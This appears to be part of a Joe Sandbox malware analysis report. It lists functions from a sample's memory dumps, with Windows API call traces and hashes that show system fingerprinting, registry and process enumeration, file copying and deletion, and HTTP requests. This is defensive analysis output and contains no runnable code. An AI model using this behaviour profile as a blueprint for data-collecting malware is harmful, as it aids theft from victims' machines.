Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91

Function 61E541A0 Relevance: 6.8, APIs: 2, Strings: 2, Instructions: 772stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E541DC
strcmp.MSVCRT ref: 61E543C4

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

@, xrefs: 61E54291
rnal, xrefs: 61E547EC

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: strcmp$free
String ID: @$rnal
API String ID: 3401341699-826727331
Opcode ID: 04d5e6c441bbf8750f8d4e7631d4b0402e699f56de4de675d1cbd554cb088b02
Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
Opcode Fuzzy Hash: 04d5e6c441bbf8750f8d4e7631d4b0402e699f56de4de675d1cbd554cb088b02
Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51

Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
lstrlenA.KERNEL32(00000000), ref: 0040ADEC

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

DeleteFileA.KERNEL32(00000000), ref: 0040AE73

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 807784e4d5b4097708b1d81bd8132747ebd3bfe02f60bc97d287e8103a5e3d61
Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
Opcode Fuzzy Hash: 807784e4d5b4097708b1d81bd8132747ebd3bfe02f60bc97d287e8103a5e3d61
Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A

Function 00411C60 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B

Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,00974400,00000000,?), ref: 00417982
Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,00974400,00000000,?), ref: 00417989

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83

Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D

Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5

Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2

Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D

GetCurrentProcessId.KERNEL32(00000000,?,009746C0,00000000,?,00420E0C,00000000,?,00000000,00000000,?,00974098,00000000,?,00420E08,00000000), ref: 004122CE

Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F

Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,0096E590,00000000,00020119,?), ref: 00417FEE
Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,00974360,00000000,00000000,000000FF,000000FF), ref: 0041800F
Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022

Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168

Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6

Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C

Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0

Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,0096F1F8,00000000,00020019,00000000,004205BE), ref: 00418534

Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB

Strings

aA, xrefs: 004128D4, 00412902, 004128D7

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: aA
API String ID: 2204142833-2414573348
Opcode ID: 20d0b609ef32cf42b6c6fc92dfc40e1c6d6336cdf5d7838363857d2f256b376a
Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
Opcode Fuzzy Hash: 20d0b609ef32cf42b6c6fc92dfc40e1c6d6336cdf5d7838363857d2f256b376a
Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B

Function 61E4928D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 61E4947D

Strings

exclusive, xrefs: 61E493FC
winOpen, xrefs: 61E49605

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: CreateFile
String ID: exclusive$winOpen
API String ID: 823142352-1568912604
Opcode ID: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
Opcode Fuzzy Hash: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41

Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Strings

ERROR, xrefs: 0041546A
ERROR, xrefs: 004154C3

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E

Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
lstrcatA.KERNEL32(?,00975F48), ref: 004152F8

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Strings

9dA, xrefs: 0041531F, 00415344, 00415322

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: 9dA
API String ID: 2699682494-3568425128
